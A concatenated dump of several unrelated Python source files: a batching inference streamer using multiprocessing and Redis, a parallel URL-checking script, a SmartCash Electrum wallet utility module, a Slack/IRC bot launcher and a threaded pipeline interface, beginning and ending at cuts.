super().__init__(predict_function, batch_size, max_latency, *args, **kwargs)
self._request_queue = request_queue
self._response_queue = response_queue
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._request_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._response_queue.put((task_id, request_id, model_output))
class Streamer(_BaseStreamer):
def __init__(self, predict_function_or_model, batch_size, max_latency=0.1, worker_num=1,
cuda_devices=None, model_init_args=None, model_init_kwargs=None):
super().__init__()
self.worker_num = worker_num
self.cuda_devices = cuda_devices
self._input_queue = mp.Queue()
self._output_queue = mp.Queue()
self._worker = StreamWorker(predict_function_or_model, batch_size, max_latency,
self._input_queue, self._output_queue,
model_init_args, model_init_kwargs)
self._worker_ps = []
self._worker_ready_events = []
self._worker_destroy_events = []
self._setup_gpu_worker()
self._delay_setup()
def _setup_gpu_worker(self):
for i in range(self.worker_num):
ready_event = mp.Event()
destroy_event = mp.Event()
if self.cuda_devices is not None:
gpu_id = self.cuda_devices[i % len(self.cuda_devices)]
args = (gpu_id, ready_event, destroy_event)
else:
args = (None, ready_event, destroy_event)
p = mp.Process(target=self._worker.run_forever, args=args, name="stream_worker", daemon=True)
p.start()
self._worker_ps.append(p)
self._worker_ready_events.append(ready_event)
self._worker_destroy_events.append(destroy_event)
def _wait_for_worker_ready(self, timeout=WORKER_TIMEOUT):
# wait for all workers finishing init
for (i, e) in enumerate(self._worker_ready_events):
# todo: select all events with timeout
is_ready = e.wait(timeout)
logger.info("gpu worker:%d ready state: %s" % (i, is_ready))
def _send_request(self, task_id, request_id, model_input):
self._input_queue.put((0, task_id, request_id, model_input))
def _recv_response(self, timeout=TIMEOUT):
try:
message = self._output_queue.get(timeout=timeout)
except Empty:
message = None
return message
def destroy_workers(self):
for e in self._worker_destroy_events:
e.set()
for p in self._worker_ps:
p.join(timeout=WORKER_TIMEOUT)
if p.is_alive():
raise TimeoutError("worker_process destroy timeout")
logger.info("workers destroyed")
class StreamWorker(_BaseStreamWorker):
def __init__(self, predict_function_or_model, batch_size, max_latency, request_queue, response_queue,
model_init_args, model_init_kwargs, *args, **kwargs):
super().__init__(predict_function_or_model, batch_size, max_latency, *args, **kwargs)
self._request_queue = request_queue
self._response_queue = response_queue
self._model_init_args = model_init_args or []
self._model_init_kwargs = model_init_kwargs or {}
def run_forever(self, gpu_id=None, ready_event=None, destroy_event=None):
# if it is a managed model, lazy init model after forked & set CUDA_VISIBLE_DEVICES
if isinstance(self._predict, type) and issubclass(self._predict, ManagedModel):
model_class = self._predict
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
self._model = model_class(gpu_id)
self._model.init_model(*self._model_init_args, **self._model_init_kwargs)
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
self._predict = self._model.predict
if ready_event:
            ready_event.set()  # tell the parent process that init is finished
if destroy_event:
self._destroy_event = destroy_event
super().run_forever()
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._request_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._response_queue.put((task_id, request_id, model_output))
class RedisStreamer(_BaseStreamer):
"""
    1. input a batch as a task
    2. distribute every single item in the batch to redis
    3. background loop collects the results
    4. output the batch result for a task once every single item has returned
"""
def __init__(self, redis_broker="localhost:6379", prefix=''):
super().__init__()
self.prefix = prefix
self._redis_broker = redis_broker
self._redis = _RedisClient(self._client_id, self._redis_broker, self.prefix)
self._delay_setup()
def _send_request(self, task_id, request_id, model_input):
self._redis.send_request(task_id, request_id, model_input)
def _recv_response(self, timeout=TIMEOUT):
return self._redis.recv_response(timeout)
class RedisWorker(_BaseStreamWorker):
def __init__(self, model_class, batch_size, max_latency=0.1,
redis_broker="localhost:6379", prefix='',
model_init_args=None, model_init_kwargs=None, *args, **kwargs):
# assert issubclass(model_class, ManagedModel)
super().__init__(model_class, batch_size, max_latency, *args, **kwargs)
self.prefix = prefix
self._model_init_args = model_init_args or []
self._model_init_kwargs = model_init_kwargs or {}
self._redis_broker = redis_broker
self._redis = _RedisServer(0, self._redis_broker, self.prefix)
self._requests_queue = Queue()
self.back_thread = threading.Thread(target=self._loop_recv_request, name="thread_recv_request")
self.back_thread.daemon = True
self.back_thread.start()
def run_forever(self, gpu_id=None):
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
model_class = self._predict
self._model = model_class(gpu_id)
self._model.init_model(*self._model_init_args, **self._model_init_kwargs)
self._predict = self._model.predict
super().run_forever()
def _loop_recv_request(self):
logger.info("[gpu worker %d] start loop_recv_request" % (os.getpid()))
while True:
message = self._redis.recv_request(timeout=TIMEOUT)
if message:
(client_id, task_id, request_id, request_item) = pickle.loads(message)
self._requests_queue.put((client_id, task_id, request_id, request_item))
else:
# sleep if recv timeout
time.sleep(TIME_SLEEP)
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._requests_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._redis.send_response(client_id, task_id, request_id, model_output)
def _setup_redis_worker_and_runforever(model_class, batch_size, max_latency, gpu_id, redis_broker, prefix=''):
redis_worker = RedisWorker(model_class, batch_size, max_latency, redis_broker=redis_broker, prefix=prefix)
redis_worker.run_forever(gpu_id)
def run_redis_workers_forever(model_class, batch_size, max_latency=0.1,
worker_num=1, cuda_devices=None, redis_broker="localhost:6379",
prefix='', model_init_args=None, model_init_kwargs=None):
procs = []
for i in range(worker_num):
if cuda_devices is not None:
gpu_id = cuda_devices[i % len(cuda_devices)]
else:
gpu_id = None
args = [model_class, batch_size, max_latency, gpu_id, redis_broker, prefix]
p = mp.Process(target=_setup_redis_worker_and_runforever, args=args, name="stream_worker", daemon=True)
p.start()
procs.append(p)
for p in procs:
p.join()
class _RedisAgent(object):
def __init__(self, redis_id, redis_broker='localhost:6379', prefix=''):
self._redis_id = redis_id
self._redis_host = redis_broker.split(":")[0]
self._redis_port = int(redis_broker.split(":")[1])
self._redis_request_queue_name = "request_queue" + prefix
self._redis_response_pb_prefix = "response_pb_" + prefix
self._redis = Redis(host=self._redis_host, port=self._redis_port)
self._response_pb = self._redis.pubsub(ignore_subscribe_messages=True)
self._setup()
def _setup(self):
raise NotImplementedError
def _response_pb_name(self, redis_id):
return self._redis_response_pb_prefix + redis_id
class _RedisClient(_RedisAgent):
def _setup(self):
self._response_pb.subscribe(self._response_pb_name(self._redis_id))
def send_request(self, task_id, request_id, model_input):
message = (self._redis_id, task_id, request_id, model_input)
self._redis.lpush(self._redis_request_queue_name, pickle.dumps(message))
def recv_response(self, timeout):
message = self._response_pb.get_message(timeout=timeout)
if message:
return pickle.loads(message["data"])
class _RedisServer(_RedisAgent):
def _setup(self):
# server subscribe all pubsub
self._response_pb.psubscribe(self._redis_response_pb_prefix + "*")
def recv_request(self, timeout):
message = self._redis.blpop(self._redis_request_queue_name, timeout=timeout)
# (queue_name, data)
if message:
return message[1]
def send_response(self, client_id, task_id, request_id, model_output):
message = (task_id, request_id, model_output)
channel_name = self._response_pb_name(client_id)
self._redis.publish(channel_name, pickle.dumps(message))
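# --- Hedged usage sketch (illustration only; assumes the module's own imports,
# including redis and the relative .managed_model import, are resolvable) ---
# Minimal ThreadedStreamer round trip: a toy predict function that squares a
# batch; predict()/submit() calls are transparently collected into batches by
# the worker thread.
if __name__ == "__main__":
    def _square_batch(batch):
        return [x * x for x in batch]

    _streamer = ThreadedStreamer(_square_batch, batch_size=4, max_latency=0.05)
    print(_streamer.predict([1, 2, 3]))  # expected: [1, 4, 9]
    _streamer.destroy_workers()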
|
multipro-1.py
|
#!/usr/bin/env python
#coding=utf8
"""
# Author: kellanfan
# Created Time : Tue 18 Jul 2017 08:32:38 PM CST
# File Name: multipro-1.py
# Description:
"""
import os, urllib2
from multiprocessing import Process
urllist = ['http://www.jianshu.com/u/347ae48e48e3', 'https://stackedit.io/', 'http://man.chinaunix.net/develop/rfc/RFC4.txt', 'http://dockone.io/', 'http://theme-next.iissnan.com/']
def getcode(url):
header = {
        'user-agent': ('Mozilla/5.0 (Windows NT 6.2; WOW64) '
                       'AppleWebKit/537.36 (KHTML, like Gecko) '
                       'Chrome/56.0.2924.87 Safari/537.36'),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
}
req = urllib2.Request(url, headers = header)
code = urllib2.urlopen(req).getcode()
print '[\033[1;32m%s\033[0m] is ok, process is [\033[1;35m%s\033[0m]' %(url, os.getpid())
print 'Parent process %s.' % os.getpid()
processes = []
for url in urllist:
    p = Process(target=getcode, args=(url, ))
    p.start()
    processes.append(p)
for p in processes:
    p.join()
|
util.py
|
# Electrum - Lightweight SmartCash Client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json, time
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'SMART':8, 'mSMART':5, 'uSMART':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
# Raised when importing a key that's already in the wallet.
class AlreadyHaveAddress(Exception):
def __init__(self, msg, addr):
super(AlreadyHaveAddress, self).__init__(msg)
self.addr = addr
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " SMART"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
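# Illustrative usage sketch (added, not part of the original module): decorate
# any function with @profiler to have its wall-clock runtime logged through
# print_error (so the timing only shows up when verbose output is enabled).
# The decorated function below is a made-up example.
@profiler
def _profiler_demo(n):
    # deliberately does some work so the profiler has something to measure
    return sum(i * i for i in range(n))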
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum-smart'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-smart'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
    cast string to a bytes() like object; for python2 support a bytearray is copied into bytes
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-smart")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-Smart")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-Smart")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:d}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
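# Illustrative sketch (added, not part of the original module): expected
# behaviour of the two formatting helpers above, assuming the locale decimal
# point is '.' (amounts are in satoshis, default 8 decimal places).
def _format_satoshis_demo():
    assert format_satoshis_plain(150000000) == "1.5"
    assert format_satoshis(1234500000) == "12.345"
    assert format_satoshis(1234500000, is_diff=True) == "+12.345"
    assert format_satoshis(-1234500000, is_diff=True) == "-12.345"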
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Explorer': ('https://explorer.smartcash.cc/',
{'tx': 'tx/', 'addr': 'address/'}),
'Insight': ('https://insight.smartcash.cc/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'SmartCash Testnet Explorer': ('http://test-explorer.smartcash.cc',
{'tx': 'tx/', 'addr': 'address/'}),
'Dustinface Testnet Explorer': ('https://testnet.dustinface.me/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Insight')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a smartcash address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'smartcash':
raise Exception("Not a SmartCash URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid smartcash address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='smartcash', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
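# Illustrative sketch (added, not part of the original module): round-trips a
# payment URI through create_URI/parse_URI. The address argument is a
# placeholder and must be a valid SmartCash address for create_URI to return
# anything; with a valid address and COIN == 100000000 the parsed result would
# contain {'address': addr, 'amount': 150000000, 'message': 'coffee', 'memo': 'coffee'}.
def _payment_uri_demo(addr):
    uri = create_URI(addr, 150000000, 'coffee')   # 1.5 SMART expressed in satoshis
    return parse_URI(uri) if uri else None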
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
|
run_gate.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import threading
import time
import logging
import logging.config
from slackbot import settings
from slackbot.bot import Bot
from ircbot.ircbot import IrcBot
def main():
kw = {
'format': '[%(asctime)s] %(message)s',
'datefmt': '%m/%d/%Y %H:%M:%S',
'level': logging.DEBUG if settings.DEBUG else logging.INFO,
'stream': sys.stdout,
}
logging.basicConfig(**kw)
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)
#bot = Bot()
irc_bot = IrcBot()
irc_bot.run()
#bot.run()
#thread = threading.Thread(target=run, args=(irc_bot))
#thread.start()
#irc_bot.start()
#time.sleep(1)
#bot.send_message('testforbot','test message')
#while True:
# time.sleep(10)
def run(bot, irc_bot):
irc_bot.run()
if __name__ == '__main__':
main()
|
interfaces.py
|
import queue
from threading import Lock, Thread
class WorkerThread:
def __init__(self, dispatcher, data):
self.dispatcher = dispatcher
self.data = data
    def run(self):
        # Subclasses implement the actual work here; the dispatcher and the
        # payload are available as self.dispatcher and self.data.
        raise NotImplementedError
class Node:
def finishPipeline(self):
# Creates the needed queue
if hasattr(self, "succesor"):
self.queue = queue.Queue()
self.succesor.finishPipeline()
# Lock is used for the update method
self.updateLock = Lock()
def empty(self):
return self.queue.empty()
def addData(self, data, firstTime=False):
# Adds the data in the queue behind the dispatcher
# TODO: Better multithreaded support (start this method in a new thread)
# especially since update needs a lock
if hasattr(self, "succesor"):
self.queue.put(data)
if not firstTime:
Thread(target=self.succesor.update).start()
def getData(self):
if hasattr(self, "succesor"):
return self.queue.get()
else:
raise AttributeError("No Queue found")
class Source(Node):
def finish(self):
self.finishPipeline()
def start(self):
# Starts the program by calling the update method of the first dispatcher
self.succesor.update()
""" Needed for the Dispatcher to decide, if it is an input or an output """
def checkSource(self):
pass
class Dispatcher(Node):
def __init__(self):
# maxThreads = -1 => No checking
# maxThreads set to 200
self.maxThreads = 200
self.threadCount = 0
self.threadCountLock = Lock()
self.initialize()
def initialize(self):
pass
""" Default update method: Starts a new Thread, whenever there is new data """
def update(self):
# Checks if there is data in the queue
while True:
self.source.updateLock.acquire()
self.threadCountLock.acquire()
if self.source.empty() or (
self.maxThreads > -1 and self.threadCount >= self.maxThreads
):
self.threadCountLock.release()
self.source.updateLock.release()
break
